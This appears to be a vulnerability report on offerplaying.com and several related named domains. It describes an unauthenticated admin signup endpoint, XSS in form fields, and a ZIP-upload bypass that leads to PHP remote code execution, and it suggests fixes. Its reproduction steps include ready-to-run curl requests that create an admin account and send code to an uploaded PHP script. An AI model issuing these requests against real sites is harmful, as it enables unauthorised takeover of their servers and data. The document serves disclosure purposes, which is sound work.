Abstract
offerplaying.com has several chained vulnerabilities that allow to take almost full control of the machines that host that website and several other ones, such as inebook.cc, landing.ebooki.com, landing.radiuniverse.com, megaebook.cc, sub-megaebook.cc and thepolo.cc, via nginx.
Summary of all vulnerabilities
- No security controls in the https://offerplaying.com/api/user/signup API endpoint, which allows anyone to create an admin account in the website.
- XSS vulnerabilities in all form/database fields, which allow to inject Javascript code.
- There is a filter in place in order to stop PHP files from being uploaded (and therefore being executed on the server), but it can be bypassed under certain circumstances if the PHP file is uploaded as part of the ZIP template file that has to be uploaded when creating an offer. This allows for remote code execution because the uploaded PHP file is extracted into a directory in the server that can be accessed remotely and the PHP script can run exec() commands.
Steps to reproduce
- Perform the following request in order to sign up as an admin: curl -d "u_email={email_address}&u_password={password}&u_name={name}&u_surname={surname}&u_password_confirm={password}&u_country=US&u_terms=1" https://offerplaying.com/api/user/signup, substituting the placeholders with brackets with the new account details.
- In the sidebar, go to "Offers", "Add new offer". Upload the following ZIP file:
- Then, make the following request: curl -d "script=header(%22Content-Type%3A%20text%2Fplain%22)%3B%20echo%20%22Hello%20World%22%3B" https://offerplaying.com/landings/0/doo2.php?POST=1
- You should receive "Hello WorldOK" as a response to the request.
What should be done?
The signup API endpoint should have a security control so it only creates an user if an admin is logged in. Then, all PHP scripts that process forms should have a filter so it doesn't accept HTML code. Finally, a filter has to be put into the offer creating PHP script so it doesn't allow the ZIP to contain PHP code.
Attack scenario
Any person on the Internet with a minimum knowledge about Javascript and how servers work can exploit the first vulnerability in the list, and with a little bit of knowledge about security and patience can exploit the other two. Therefore, someone who wants to dump the database, which might contain very useful information for them, will be able to perform the steps above and dump the database, for example, or execute any code in the machine hosting the website.
Final comments
This vulnerability is not exploitable right now because they have turned their website off (a 404 error appears in my screen), so I will not report the vulnerability for now.